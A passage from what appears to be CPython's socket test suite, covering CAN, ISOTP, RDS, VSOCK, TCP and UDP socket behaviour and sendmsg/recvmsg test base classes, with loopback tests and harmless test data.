self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_uknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
